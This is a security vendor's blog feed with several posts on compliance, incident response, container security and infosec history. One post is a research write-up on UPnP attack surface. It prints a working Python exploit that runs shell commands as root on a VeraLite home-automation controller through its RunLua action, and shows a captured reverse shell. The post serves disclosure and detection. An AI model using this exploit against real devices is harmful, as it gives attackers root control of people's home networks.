Quantcast
Channel: Tenable Blog
Viewing all 1976 articles
Browse latest View live

The Buck Stops There: NIST SP 800-171

$
0
0

The U.S. government is ultimately responsible for preventing unauthorized access and disclosure of its non-public information. However, it will soon require its service providers to put adequate safeguards in place as well. 

Unauthorized access and disclosure of government information has become all too common in these times of frequent cyberattacks. As a result, the government is extending mandatory safeguards to nonfederal organizations that process, store or transmit Controlled Unclassified Information (CUI) or Covered Defense Information. These nonfederal organizations include contractors, subcontractors and service providers. Additionally, CUI is often provided to, or shared with, state and local governments, colleges and universities, and independent research organizations.

NIST SP 800-171: Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations provides federal agencies with recommended requirements for protecting the confidentiality of Controlled Unclassified Information (CUI) and DoD Covered Defense Information when it is processed, stored or transmitted by nonfederal organizations.

If you are familiar with NIST SP 800-53: Security and Privacy Controls for Federal Information Systems and Organizations, SP 800-171 will look familiar. It is essentially an SP 800-53 subset of tailored controls designed to protect CUI confidentiality, when the confidentiality impact value of the CUI is no lower than moderate.

Challenges of safeguarding CUI and Covered Defense Information

NIST SP 800-171 promises to promote standardization across the previously differing regulations and conflicting guidance that in the past, often resulted in confusion and inefficiencies. However, that does not mean that 800-171 compliance is without the following challenges:

Readiness Assessments: Prior to information system deployment, security assessments are required to demonstrate that safeguards comply with NIST SP 800-171 or with alternative, but equally effective, security measures. If you self-assess you must support these security assessments with comprehensive documentation to demonstrate that required controls are implemented correctly, operating as intended and producing the desired outcome. Assessing administrative controls, such as documenting security awareness training, can be done manually. However, realistically you must automate technical control assessment.

Ongoing Security Assessment: Obtaining initial authorization to operate is merely a good start. However, most networks are highly dynamic, so you cannot rely on periodic snapshots to safeguard covered information. Therefore, you must also monitor security controls on an ongoing basis to ensure their continued effectiveness. When the inevitable issues are discovered, you must communicate them internally and implement corrective action.

Control Consolidation: If your organization is one of the many with multiple compliance requirements, you are forced to dedicate an inordinate amount of resources to generating documentation for various auditors. This is especially costly if you are using multiple systems to monitor, assess and report across multiple compliance domains. Wherever possible, you need a common set of controls and “multilingual” reporting that documents control status using domain specific language.

Monitor, assess and communicate

Tenable just announced a new capability in SecurityCenter Continuous View® (SecurityCenter CV™) that enables you to measure, visualize and effectively communicate adherence to most NIST SP 800-171 technical security controls by automating their operation, monitoring and assessment to ensure they are implemented correctly, operating as intended and producing the desired outcome.

SecurityCenter CV provides fully customizable reports, dashboards and Assurance Report Cards® (ARCs) specific to NIST SP 800-171 – all out-of-the-box. You can use them as-is or quickly and easily tailor them to meet your specific security and business needs.

For example, the SecurityCenter CV Audit and Monitoring Dashboard aligns with the Audit and Accountability (section 3.3) and System and Information Integrity (section 3.14) families in NIST SP 800-171. These families are closely related, requiring the monitoring, analysis, investigation and reporting of unlawful, unauthorized or inappropriate information system activity – including inbound and outbound communications traffic – to detect attacks and indicators of potential attacks. By using this dashboard, you can better correlate audit review, assessment and reporting processes for investigating and responding to indications of inappropriate, suspicious or unusual activity. You will also be able to monitor information system security alerts and advisories and take appropriate actions in response.

NIST 800-171 Dashboard
Security Center CV Dashboard for Audit and Accountability, & System and Information Integrity

SecurityCenter CV offers multiple dashboards and Assurance Report Cards to help you automate SP 800-171 control monitoring, assessment and communication. Please take a minute to learn more about these new ARCs.


SecurityCenter: Leveraging Vulnerability Data Collection for Incident Response

$
0
0

Prioritizing threat management and vulnerability remediation may be seen as a roadblock to effective incident response (IR) preparation, but in reality the efforts assist each other quite well. Fortunately, you can use SecurityCenter Continuous View® (SecurityCenter CV™) to improve your threat mitigation and vulnerability remediation efforts while more effectively preparing for, detecting, and preventing incidents in your environment. The steps you take with SecurityCenter CV to detect and remediate vulnerabilities can enable you to effectively and efficiently respond to incidents.

Preparation and data collection

An important step in preparing SecurityCenter CV to assist in threat management and incident response efforts is to schedule routine credentialed scans of targeted endpoints. Credentialed scans analyze the targeted host in order to gather machine- and user-specific data. SecurityCenter CV has several built-in scan policies that are useful to gather the vulnerability data related to IR, such as the Malware Scan policy and the Credentialed Patch Audit policy. Additionally, a custom credentialed scan could be configured to be more inclusive, thereby gathering more data relevant to incident response. For an ideal threat management and incident response preparation scan, the following plugin families should be enabled:

  • Backdoors
  • Brute force attacks
  • Denial of Service
  • Gain a shell remotely
  • General
  • Incident Response
  • Misc
  • Service Detection
  • Settings
  • Local Security Checks
    • Debian, Mac OS X, Red Hat, VMWare ESX, and others
  • Windows
    • Windows, Windows : Microsoft Bulletins, Windows: User Management

The OS-specific and Incident Response families will attempt to gather detailed information about user accounts and behavior, as well as vulnerabilities exposed by missing patches. Plugins are added to the local security checks and Microsoft Bulletins families in response to emerging threats. These plugins are often also tied to CVE numbers in order to improve tracking and monitoring of the threat. Additionally, plugins are added to these families when OS-specific vulnerabilities are identified in an application so that the vulnerable instances of the application can be more easily identified.

Custom or default scan policies

In addition to running credentialed scans, relevant data can be gathered by the Tenable Log Correlation Engine® (LCE®) and the Tenable Passive Vulnerability Scanner® (PVS™). The passive data gathered by PVS is automatically stored in the vulnerability database. In addition to providing normalized events to the SecurityCenter CV events database constantly, LCE converts data from normalized events into event plugins and sends them to the SecurityCenter CV vulnerability database. The event plugins can be leveraged alongside active and passive vulnerability data to prevent and detect incidents, as well as manage and mitigate risk from vulnerabilities.

Analysis

All of the data gathered by the sensors included in SecurityCenter CV can be effectively and efficiently interpreted through the use of dashboards and reports. The Incident Response Support dashboard and report present detailed information about areas of concern, such as detected services, host compromise, and suspicious activity.

Incident Response Support dashboard

When the alerts are triggered and the alarms go off, panic often ensues. When the alerts and alarms are triggered by a network incident, analysts can have difficulty determining where to start remediation efforts. The data gathered by SecurityCenter CV can be invaluable after an incident in order to determine the source, cause, and scope:

  • If the source IP address is known, filtering vulnerability data for that address can provide detailed information about the potential exploitation opportunities, user accounts accessing that host, and connections between that host and others.
  • If the incident was the result of an exploited vulnerability, a search for that vulnerability will provide a list of similarly exploitable hosts.
  • Additional details about host activity is available from active plugins tracking host information, running processes, and user activity.
  • Identifying running and malicious processes can be useful when dealing with anything from user activity to malware infections.
  • The data gathered about Autoruns, prefetch files, and startup applications on Windows can help to identify, track, and contain malicious activity.
  • Leveraging the known data about an incident to identify the full impact is an especially effective way to contain the issue at hand and prevent recurrence.
  • Preconfigured content from the SecurityCenter Feed, such as dashboards and reports, can be useful in visualizing information related to an incident.

Preconfigured dashboards and reports can be added from the SecurityCenter Feed to support threat management and incident response efforts:

  • From the Dashboard tab, click the Options menu on the right then choose Add Dashboard to search the Feed for relevant dashboards.
  • From the Reports tab under the Reporting menu, click the Add button to bring up the Feed and search also.
  • When content is added from the SecurityCenter Feed, the Targets filter in the Focus section can be set so that specific targets will be added automatically as filters. Setting this filter will enable your security team to more efficiently gather information about specific targets when responding to incidents on the network.
  • For custom content, filters related to plugin families or names can help focus results on areas of concern, while filtering for assets or IP address ranges can focus the content on specific parts of the network.
Targets Filter from Feed

Next steps

Now that you know more about how to leverage SecurityCenter Continuous View in your threat management and incident response preparation initiatives, you can start applying the knowledge to your own environment. Configure credentialed scans to run regularly, gather data from as many hosts as possible, and investigate incidents when they occur. All of those steps will enable you to take advantage of the integrated capabilities of SecurityCenter CV in order to improve your threat management, vulnerability remediation, and incident response efforts.

Forbes Names Tenable as One of the Next Billion-Dollar Startups for 2016

$
0
0

This week, Forbes released its second annual list of billion-dollar startups. Tenable is proud to be included in this prestigious list of 25 up and coming companies for 2016.

2016 seems to be the year that organizations have realized there’s no silver bullet start-up that can combat the vast complexities of today’s cybersecurity landscape. With steady growth and innovation over the past 14 years, Tenable has always been positioned to help our customers combat increasing threats and has extended our platform to some of the largest enterprises around the globe.

Read more about why Forbes chose Tenable as a next billion-dollar startup.

Read the full article

Do You Know Where Your UPnP Is?

$
0
0

Much has been said about the security of Universal Plugin and Play (UPnP) over the years. There have been FBIwarnings, security researchers havepublishedpapers, and even Forbes has told us to disable UPnP. But how do you know if UPnP servers are on your network? Are there specific services we should worry about? Do we really need to be concerned about UPnP?

Finding UPnP services

To answer some of these questions, Tenable wrote a simple Python script called upnp_info.py. You can find it on our GitHub. The script finds all UPnP services and enumerates their functionality. Check out the README for full details.

Some of you may be thinking, “I don’t need that script. I know I disabled UPnP.” But did you? Consider this screenshot of my home router’s web interface:

Router web interface

Looks like I disabled UPnP, right? Here’s what upnp_info.py says about my network:

[+] Discovering UPnP locations
[+] Discovery complete
[+] 2 locations found:
	-> http://192.168.1.1:1990/WFADevice.xml
	-> http://192.168.1.1:1901/root.xml

Looks like there are still a couple of UPnP services available on my router even after apparently disabling that functionality. What does the UPnP Enabled checkbox on the router’s UI do? I enabled it to find out what the difference is:

[+] Discovering UPnP locations
[+] Discovery complete
[+] 3 locations found:
	-> http://192.168.1.1:39468/rootDesc.xml
	-> http://192.168.1.1:1990/WFADevice.xml
	-> http://192.168.1.1:1901/root.xml

Another UPnP service! But what are all these for? upnp_info.py provides a long description of each UPnP location it encounters. Since this output is verbose, here’s a look at just the services provided by the new UPnP server on port 39468:

[+] Loading http://192.168.1.1:39648/rootDesc.xml...
	-> Server String: Linux/BHR4 UPnP/1.1 MiniUPnPd/1.8
	==== XML Attributes ===
	-> Device Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
	-> Friendly Name: Verizon FiOS-G1100
	-> Manufacturer: Linux
	-> Manufacturer URL: http://www.verizon.com/
	-> Model Description: Linux router
	-> Model Name: Linux router
	-> Model Number: FiOS-G1100
	-> Services:
		=> Service Type: urn:schemas-upnp-org:service:WANIPConnection:1
		=> Control: /ctl/IPConn
		=> Events: /evt/IPConn
		=> API: http://192.168.1.1:45973/WANIPCn.xml
			- SetConnectionType
			- GetConnectionTypeInfo
			- RequestConnection
			- ForceTermination
			- GetStatusInfo
			- GetNATRSIPStatus
			- GetGenericPortMappingEntry
			- GetSpecificPortMappingEntry
			- AddPortMapping
			- DeletePortMapping
			- GetExternalIPAddress

You can generally figure out what type of service a UPnP server offers by looking at the “Device Type” attribute. Above, you can see that the device type is urn:schemas-upnp-org:device:InternetGatewayDevice:1. This UPnP server implements the infamous Internet Gateway Device (IGD) Protocol.

IGD allows anyone on the LAN to open holes in the router’s firewall. Everyone should disable IGD since it is easily abused by both insider threats and malware. And don’t think IGD is only a liability on the LAN. A tool called Filet O Firewall has proven that a motivated remote attacker can reach it from the WAN too. Nessus® users can use plugin 35707 to check for IGD manipulation.

However, I’m not here to talk about IGD. IGD has been written and talked about so much that it has almost become interchangeable with UPnP. Yet, UPnP has so much more to offer! It can be used to create file shares, stream media, control the volume on your television, unlock your front door, and just about anything that a developer can imagine!

Examining a different type of UPnP server

Now take a look at a different UPnP server on my home network and consider the security threats it might represent.

On my network, I have a smart home controller called VeraLite. The device implements multiple UPnP services, but I’ll focus on the HomeAutomationGateway interface.

[+] Loading http://192.168.1.251:49451/luaupnp.xml...
	-> Server String: Linux/2.6.37.1, UPnP/1.0, Portable SDK for UPnP devices/1.6.6
	==== XML Attributes ===
	-> Device Type: urn:schemas-micasaverde-com:device:HomeAutomationGateway:1
	-> Friendly Name: MiOS 35035299
	-> Manufacturer: MiOS, Ltd.
	-> Manufacturer URL: http://www.mios.com
	-> Model Description: MiOS Z-Wave home gateway
	-> Model Name: MiOS
	-> Model Number: 1.0
	-> Services:
		=> Service Type: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1
		=> Control: /upnp/control/hag
		=> Events: /upnp/event/hag
		=> API: http://192.168.1.251:49451/luvd/S_HomeAutomationGateway1.xml
			- Reload
			- GetUserData
			- ModifyUserData
			- SetVariable
			- GetVariable
			- GetStatus
			- GetActions
			- RunScene
			- SceneOff
			- SetHouseMode
			- RunLua
			- ProcessChildDevices
			- CreateDevice
			- DeleteDevice
			- CreatePlugin
			- DeletePlugin
			- CreatePluginDevice
			- ImportUpnpDevice
			- LogIpRequest

As you can see from the device type, this interface is not one of the standard profiles defined by the Open Interconnect Consortium (formerly the UPnP Forum). The standard profiles start with urn:schemas-upnp-org, but this HomeAutomationGateway profile starts with urn:schemas-micasaverde-com. This is a custom schema defined by MiCasaVerde (the maker of VeraLite).

What does this mean? It simply means that this UPnP interface is not burdened by a specification released by a governing body. The server’s developers, MiCasaVerde, can implement any actions they’d like. So, I need to look at the API closely to determine if any of the available actions present a security risk. For example, is the Reload action a denial of service vector?

Background research into the VeraLite revealed that, in 2013, Daniel Crowley (@dan_crowley), Jennifer Savage (@savagejen), and David Bryan (@_videoman_) wrote and presented a paper called Home Invasion 2.0. The paper includes details about using VeraLite’s HomeAutomationGateway RunLua action to gain root access on the device (TWSL2013-019 - CVE-2013-4863)! This is exactly the type of thing you should be worried about. Looking back at the upnp_info.py output, the RunLua action is available for our use.

Testing the RunLua action

Given Daniel’s previous success in executing Lua code via RunLua, I figured I’d give it a try too. I assumed I’d have little chance of success since this vulnerability was reported 3 years ago and my VeraLite was running the latest firmware (1.7.855 released in August 2016). However, given MiCasaVerte’s response to SpiderLab’s disclosure, I decided it couldn’t hurt to try.

I created a simple script that would attempt to execute touch /tmp/hello:

import requests
import sys

if len(sys.argv) != 2:
    print 'Usage: ./run_lua.py <url>'
    sys.exit(0)

payload = ('<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" 
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">' +
    '<s:Body>' +
    '<u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1">' +
    '<Code>os.execute(&quot;touch /tmp/hello;&quot;)>/Code>' +
    '</u:RunLua>' +
    '</s:Body>' +
    '</s:Envelope>')

soapActionHeader = { 
    'soapaction' : '"urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"',
    'MIME-Version' : '1.0',
    'Content-type' : 'text/xml;charset="utf-8"'}

resp = requests.post(sys.argv[1], data=payload, headers=soapActionHeader)
print resp.text

I was pretty surprised when I saw this response:

$ python run_lua.py http://192.168.1.251:49451/upnp/control/hag<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" ><s:Body><u:RunLuaResponse xmlns:u="Unknown Service"><OK>OK</OK></u:RunLuaResponse></s:Body> </s:Envelope>

It worked! I even SSH’ed in and verified that the new file existed in /tmp/. That means anybody on my LAN can get root access to my VeraLite! The device that is supposed to control all the other smart devices in my home is rootable via a single UPnP action!

That’s bad but this is restricted to my LAN, right? I guess I trust the people on my LAN. And I’d certainly never be so foolish as to expose this thing to the Internet.

Getting a reverse shell from the WAN

That got me thinking though… what would it take for a remote attacker to trigger the RunLua action? Assuming an attacker could direct a user from my LAN to a website, how could this be exploitable? There are a couple of obstacles an attacker would have to overcome:

  • The attacker would need to figure out the VeraLite’s IP address
  • The attacker would need to bypass the browser’s same-origin policy

Figuring out the VeraLite’s IP address wouldn’t be too hard. An attacker can get the victim’s private IP address using the WebRTC IP leak. Simply knowing the victim’s private IP doesn’t reveal the VeraLite’s address, but it could help an attacker guess the address.

Bypassing the browser’s same-origin policy in order to communicate from the victim’s browser to the VeraLite isn’t easy though… But wait! VeraLite is using Portable SDK for UPnP Devices (libupnp) version 1.6.6. Besides being vulnerable to a handful of stack overflows, 1.6.6 is also vulnerable to CVE-2016-6255! CVE-2016-6255 allows me us to create an arbitrary file in the server’s web root. I can create a webpage on the VeraLite and then load it in an iframe. That would get around the same-origin policy!

Proof of concept

In order to flesh this out, I wrote a proof of concept. You can find the code on my GitHub. When runlua.html is loaded into a victim’s browser and VeraLite is present on the victim’s LAN, the result is a reverse shell for the attacker. It looks like this:

albino-lobster@ubuntu:~$ nc -l 1270
/bin/sh: can't access tty; job control turned off

BusyBox v1.17.3 (2012-01-09 12:40:42 PST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ #

What’s truly interesting about this attack is that it doesn’t just apply to the VeraLite. A remote attacker can invoke any action on any UPnP server that uses libupnp before the fix for CVE-2016-6255 by using this same-origin bypass.

Tenable solutions

Tenable recently released a Nessus plugin that exercises the VeraLite UPnP RunLua vulnerability. The plugin ID is 93911.

VeraScan Plugin

Furthermore, Tenable has recently revamped the Nessus UPnP plugins to improve discovery and provide further insight into UPnP server functionality. For example, in the VeraLite scan above, there is a plugin named UPnP API Listing (94047) that displays the UPnP actions that the server supports.

UPnP API Listing Plugin

Other new plugins include UPnP File Share Detection (94046) and IGD Port Mapping Listing (94048).

Conclusion

Understanding the attack surface of your network is of utmost importance. UPnP can make that challenging because services are not always easy to find or understand. The tools we’ve provided should help you take the first step in discovering and locking down your UPnP services.

Mr. Robot and Your Crown Jewels

$
0
0

Through Season 2 of Mr. Robot, we saw the aftermath of the 5/9 hacks and gained more of an understanding of what roles each character plays in the attack. While last season focused on gaining initial entry to E Corp, this season showed what happens after the initial breach. Many security professionals spend huge amounts of time, effort, and money on trying to prevent malicious actors from breaching the perimeter, but neglect what can happen once inside.

The crown jewels

In penetration testing, the goal for any attack simulation should be to identify and attack the organization’s “crown jewels” – the thing that would cause them the most harm if compromised, stolen, or made unavailable. These can be things like patient records for medical facilities, stored credit card numbers for merchants, or intellectual property for software companies. Unfortunately, many penetration testers still end their assessments after gaining domain administrator permissions and completely neglect demonstrating impact to their clients, leaving them to wonder what the point of the assessment was and where to go next.

Mr. Robot Season 2 Spoiler Alert!

F Society and the Dark Army decided to target the uninterruptable power supplies (UPS) in E Corp’s paper backup facility as their crown jewel. This makes sense because the original goal was to completely wipe out E Corp’s records of customer debt. Season 1 showed F Society wiping the digital records, but the paper backups were still being shipped to a separate facility. By getting their malware in the UPS firmware and causing the battery regulators to stop working, F Society can destroy the last remaining records of the debt by causing a massive fire in the backup facility.

Now I don’t recommend terrorism as a method for demonstrating impact to an organization, but these are the “what if’s” we should be identifying and simulating as red teamers and trying to defend against on the blue team. Domain admin credentials are a very useful tool, but shouldn’t be the stopping point (unless that was all the scope allowed). This provides much more value to the organization by identifying risks with tangible impacts and gives them an idea of where they should invest their security budget to help protect the crown jewels.

Insider threats

The other risk is the insider. Many times throughout this season, F Society relied on Angela, who is now an employee at E Corp, to do something for them that would be very risky or impossible for them to do themselves. Angela had legitimate access to the E Corp office and a computer on the domain. F Society used Angela to plant the femtocell on the controlled floor to compromise the FBI agent phones, as well as having her plug the USB Rubber Ducky into Mr. Green’s workstation to steal his credentials. Insiders can be blackmailed, coerced, or act on their own motivation. Regardless of the driver towards maliciousness, they pose a serious threat because insiders often know what your crown jewels are, where they are, and how to get to them. This pre-existing knowledge combined with legitimate access can be a perfect storm for a breach.

As Mr. Robot shows us, all it takes is a single employee to open the door for attackers. Rules only apply to those willing to follow them; attackers always ignore the rules. No amount of policy and paperwork can stop someone who is determined to harm an organization. You need a plan for identifying weaknesses and for validating that your security policies are properly implemented. You also need to wargame that plan to make sure that the plan is implemented and functioning properly on a continual basis. Always assume that you will be breached at some point, and that you must be ready to identify, contain, and eradicate a compromise in short order.

Protective action

To protect your organization from insider threats, focus on these issues:

  • Track, correlate, and alert on insider movement via network logs; establish a baseline of normal behavior, and then alert on divergences
  • Monitor and follow up on any exfiltration of data, regardless of whether or not the actor is a “trusted source”
  • Train your employees to recognize and report social engineering (attempts to manipulate an employee into sharing confidential information)
  • Educate employees to avoid falling prey to phishing emails (messages supposedly authored by a trusted insider and making a questionable request, such as sending confidential financial data to an executive)

A product like SecurityCenter Continuous View® provides tools such as the Insider Threat Dashboard to help differentiate the activity of trusted sources from malicious behavior.

Knowing who and what is on your network, what your crown jewels are, and having a plan to protect them not just from the outside, but also from insiders, is a great lesson we can learn from this season of Mr. Robot.

Expanding Vulnerability Management to Container Security: FlawCheck Joins Tenable

$
0
0

Today marked a significant milestone, as Tenable Network Security announced the acquisition of FlawCheck, a company that Sasan Padidar and I founded in early 2015. We built FlawCheck to address the difficulty of detecting security risks, at scale, in the world's largest data centers. As we engaged with some of the largest companies on their next-generation data center security challenges, we honed in on container environments as an area particularly fraught with issues.

As organizations seek to accelerate their innovation cycles to deliver better products to customers, DevOps and containerized software are becoming the norm. In fact, a recent survey found 53% of companies had either deployed or were in the process of evaluating containers.

Vulnerabilities are being inadvertently introduced into production

But with new technologies and processes come new challenges. Most notably, vulnerabilities are being inadvertently introduced into production through these nascent DevOps processes – a significant blind spot for security teams. An additional challenge is that in container environments, the role of security operations often changes, with the development team typically taking responsibility for both provisioning and vulnerability remediation.

This is the challenge we have addressed with FlawCheck and are excited to continue working on at Tenable. The product today serves as a private registry for container images, automatically scanning images for vulnerabilities and malware as they’re built, before they can reach production, and continuously monitoring them thereafter. By integrating with the continuous integration and continuous deployment (CI/CD) systems that build container images, it helps ensure production code is secure and compliant with enterprise policy.

The stakes for enterprise security are only growing, as containers deliver more of the world’s digital innovation every day.

The stakes for enterprise security are only growing, as containers deliver more of the world’s digital innovation

Bringing the FlawCheck team, technology, and product to Tenable is an exciting move. This acquisition marks many firsts. For the industry, it is the first acquisition of a container security company. For Tenable, it is the company’s first acquisition in its storied 14 year history, and its first entrance into the application security space. It's a thrilling time to be in technology and the FlawCheck team is honored to join Tenable.

The combined Tenable/FlawCheck team is now working to bring a fully integrated container security offering to market in early 2017.

In the meantime, enterprise security professionals and developers can register for a free trial of FlawCheck. As we move forward, we'll provide additional details on our product strategy and offerings. Best wishes on your container journey!

Top Oil and Gas Cybersecurity Threats Driving the Need for Vulnerability Management

$
0
0

We hear the headlines every day: “cyberattacks continue to grow each year in number and sophistication.” We also often hear that the costs of detecting and defending against cyberattacks continue to swell, yet pale in comparison to the costs of recovering from a cyberattack. Despite universal warnings about the dangers of cyberattacks, the response and attention to cybersecurity still differs from sector to sector.

The oil and gas industry, for example, is a sector that historically has not been cybersecurity focused. The oversupply and subsequent downturn in price per barrel has left many companies struggling to stay afloat, and cybersecurity spending continues to be a low priority in 2017 for many oil companies.

This is a potentially devastating mistake. A recent study by Boston Consulting Group found that none of the oil and gas companies surveyed have undergone a comprehensive audit of their value chain, which includes corporate, upstream, midstream, and downstream operations.

The scope of activities within the oil and gas industry’s value chain creates many potential points of entry for attack. It also leaves the industry prone to multiple types of attacks. These include attacks on the industry’s physical infrastructure (such as cutting fiber-optic cables), the disabling of critical systems (through denial-of-service attacks, for instance), and the theft or corruption of information or the prevention of its dissemination.Boston Consulting Group Study

As you can see, given today’s threat landscape, oil and gas is in a precarious position. Adding cybersecurity to this industry is an onerous challenge but achievable if the industry, as a whole, makes a cultural shift towards ingraining cybersecurity into the DNA of the operations of the organization. The first start in this process is recognizing that cybersecurity is paramount to the health and safety of all personnel and the local environments where operations are conducted.

Adding Security to Health, Safety and Environment (HSE)

One of the main challenges within the oil and gas industry is the need for companies to track cybersecurity incidents as Health, Safety and Environment incidents.

Currently, oil and gas companies track incidents, or near misses, that could impact the health and safety of personnel or of the local environment. Cybersecurity incidents and near-misses should likewise be tracked and escalated as HSE events. Additionally, the implementation of this strategy within a larger Enterprise Vulnerability Management (EVM) program can further bolster the integrity of an organization.

By implementing cybersecurity in HSE and a larger EVM program, oil and gas companies can provide greater resources and attention towards the three top IT security issues facing this sector:

  • The need for more employee cybersecurity training and awareness testing
    The use of mobile technology is huge in oil and gas, particularly in upstream where constant exploration requires constant travel. This need for cyber-awareness equates to the need for organizations to instill the policies and procedures that not only protect mobile computing devices but also portable storage.
  • Insufficient cybersecurity process and technology within operations and maintenance
    Attention to cybersecurity needs to be at the core of an EVM program. The insufficient separation of enterprise networks and plant networks, of data networks between onshore and offshore facilities, and a total lack of effective vulnerability management software have the industry at a clear disadvantage.
  • No focus on cybersecurity with vendors and third-party suppliers
    This gap is more than a simple lack of physical cybersecurity personnel at data centers and facilities. It extends to a cultural need for vendors within the oil and gas supply chain to treat cybersecurity as HSE. Attackers can simply attack a comparatively weaker link within the supply chain in order to gain a foothold in the larger organization.
    A heightened attention in this area would help update outdated and aging control systems in facilities and provide a view of data that extends beyond the corporate network and into critical vendor networks.

Enterprise vulnerability management

Adding urgency to the need to instill EVM within oil and gas companies are the new technologies on the horizon that will impact this sector in the coming years. Most of these technologies focus on producing cost-effective operational synergies and moving operations to a more digital framework. In short, the data will only grow in size, creating an even larger footprint for attack.

The increase in data will increase the vulnerabilities. It therefore becomes pivotal for oil and gas networks to have a solution like Tenable SecurityCenter Continuous View® (SecurityCenter CV™) which consolidates and evaluates all vulnerability data across an organization and, if properly configured, the entire supply chain.

By prioritizing security risks and providing a clear view of an organization’s security posture, SecurityCenter CV can boost cybersecurity efforts. SecurityCenter CV also offers pre-built, highly customizable dashboards and reports to help oil and gas organizations quantify the effectiveness of their security program. For example, the Qualitative Risk Analysis dashboard can provide a detailed view of an organization’s security posture with CVSS as a base line for analysis.

To learn more about how SecurityCenter CV can help better protect your organization, please visit Tenable Network Security.

Ghosts of InfoSec

$
0
0

As National Cybersecurity Awareness Month draws to a close on Halloween, it is a fitting time to reflect on some of the ghosts of infosec.

Friendly and unfriendly ghosts

The ghosts of infosec include both friendly and unfriendly spirits. The friendly ones remind us of the lessons learned and the knowledge we've gained through the decades of our young industry; they also inspire us to look forward and to build on their work. Sadly, we do have quite a few unfriendly ghosts to contend with, from those which are merely troubling to some which are truly terrifying.

Willis Ware understood the significance of computers long before most, saying in 1966:

“The computer will touch men everywhere and in every way, almost on a minute-to-minute basis. Every man will communicate through a computer whatever he does. It will change and reshape his life, modify his career and force him to accept a life of continuous change.”

Decades before it became a popular concern, Ware predicted that increased reliance on computers would present serious privacy issues. He led several committees aimed at safeguarding computer user privacy rights, including the Privacy Protection Commission created by President Ford, which led to the creation of the Federal Privacy Act of 1974.

I won’t dwell on the most terrifying ghosts; the media does a good job of scaring us all with the latest cybersecurity nightmares, from insecure medical devices to default credentials on IoT systems. Those of us in the industry have a wide array of our own hauntings depending on our experiences, from pervasive web application vulnerabilities such as SQL injection to unvalidated inputs to unpatched software and flawed crypto.

Oldies but goodies

There are two reports from the sixties and seventies which I still find valuable, and they also provide good resources for exploring both ends of our ghost spectrum.

The first is the Ware Report (officially titled Security Controls for Computer Systems), a foundational text on computer security which established an understanding of security issues which is still relevant today despite its age and the rapid evolution of computer technology. The Ware report gave us insights including:

…certainly security control will be cheapest if it is considered in the system architecture prior to hardware and software design.

and

User convenience is an important aspect of achieving security control because it determines whether or not users tend to find ways to get around, ignore, or subvert controls.

The Ware report also gave us this graphic, which identifies key vulnerabilities:

Figure 3 from the Ware Report

Figure 3, from Security Controls for Computer Systems

As dated as this is, with a few changed labels, this graphic is almost as accurate today as it was nearly 50 years ago when first published; the critical leakage points are still valid.

Bob Abbott’s many contributions to computing and security include authoring the first set of Privacy and Data Confidentiality policies for the Health Care area (1974) and the development of the first multi-user, multi-tasking operating system for Cray class supercomputers to go into 24X7 operational deployment. He also led a project that produced the first physiological monitoring system for patients recovering from open-heart surgery. Abbott may be best remembered by some as an advisor to the movie Sneakers. The James Earl Jones character in the movie was named Bernard Abbott in a nod to him, and many characters were modeled after members of Bob’s team.

The Ware Report is inspirational; it reminds us of the people who have come before us, and the work they have done; it truly provides a group of “friendly infosec ghosts” who paved the way into the cybersecurity industry. Unfortunately, rereading the report also reminds us of how long we have struggled with some of the fundamental issues of securing information and how much work we still need to do before they will stop haunting us.

Rereading the report also reminds us of how long we have struggled with some of the fundamental issues of securing information

Another early report I find informative is Security Analysis and Enhancements of Computer Operating Systems (authored by Bob Abbott and others), part of the RISOS (Research in Secured Operating Systems) project. Although this report has not aged as well as the Ware Report, it is still informative. This report outlined seven key operating system security flaws covering issues including parameter validation, logic flaws, identification/authentication/authorization failures, and more that any modern student of software security would recognize. As before, this shows us both good work that we can continue to build upon and ghosts we have yet to exorcise. In spite of being another reminder of flaws we have yet to resolve, it is good to consider that as an industry we have made great strides in driving some of these ghosts out of our operating systems – unfortunately many have moved to the application layer and continue to haunt us there.

Moving forward

Admiral Grace Hopper was a computer pioneer whose career spanned decades, from the early days of programming with patch cables and later with DIP switches to her invention of the first programming language compiler. One of Adm. Hopper’s most notable contributions to the field is the term “debugging,” which comes from her solving a computing “bug” by removing a moth from an electromechanical relay in a computer system. Her importance to computing in the US Navy was so great that the first two times she retired, the Navy brought her back – she finally retired as a Rear Admiral in 1986.

As we close the door on another National Cybersecurity Awareness Month, we must remember how far we have come, and how far we have yet to go. As bad as some of the poltergeists are, let’s try to focus on the friendly ghosts that remind us of how far we have come – from pioneers such as Admiral Grace Hopper, Willis Ware, Bob Abbott, and many more; and the foundational work they did.

We must remember how far we have come, and how far we have yet to go

Isaac Newton is often credited with the saying “If I have seen further it is by standing on the shoulders of giants.” All of us working to improve the state of cybersecurity stand on the shoulders of many giants; remember those ghosts and maybe we can all get a good night’s sleep on this All Cybers’ Eve.


Modernizing Government Technology

$
0
0

Recently Jack Huffard guest blogged for The Northern Virginia Technology Council (NVTC), the largest technology council in the United States. InModernizing Government Technology, Jack discusses the Modernizing Government Technology Act of 2016, which addresses the need to replace legacy IT in the federal government.

“If it works, don’t fix it” no longer applies; legacy systems can harbor security weaknesses and vulnerabilities that can cripple an agency. The MGT Act would help agencies fund projects to replace outdated systems, to transition to the cloud, or to enhance information security technologies. Jack explains how the IT modernization funds would work in this informative blog.

Read the full article

Jack will also be participating in the Collaborating for Cyber Success Panel at NVTC’s Capital Cybersecurity Summit on November 2-3, 2016 at the Ritz-Carlton Tysons Corner in McLean, VA.

Tenable SecurityCenter and McAfee ePolicy Orchestrator Integration

$
0
0

McAfee ePolicy Orchestrator (ePO) is security management software for enterprise systems, providing agent-based accounting of managed networked assets. With automated policy management, you can centrally control the security processes of your organization and make faster, fact-based decisions to ensure the optimal protection of your critical assets and data. Currently, endpoint protection platforms like McAfee ePO lack vulnerability context (MVM was discontinued in January 2016). However, by having access to vulnerability data, McAfee ePO customers can achieve the following benefits:

  • Accurate and complete inventory of vulnerable assets, devices and systems
  • Visibility and confidence in your organization’s security posture
  • Data-based context for effective decision-making on action and remediation

How Tenable can help

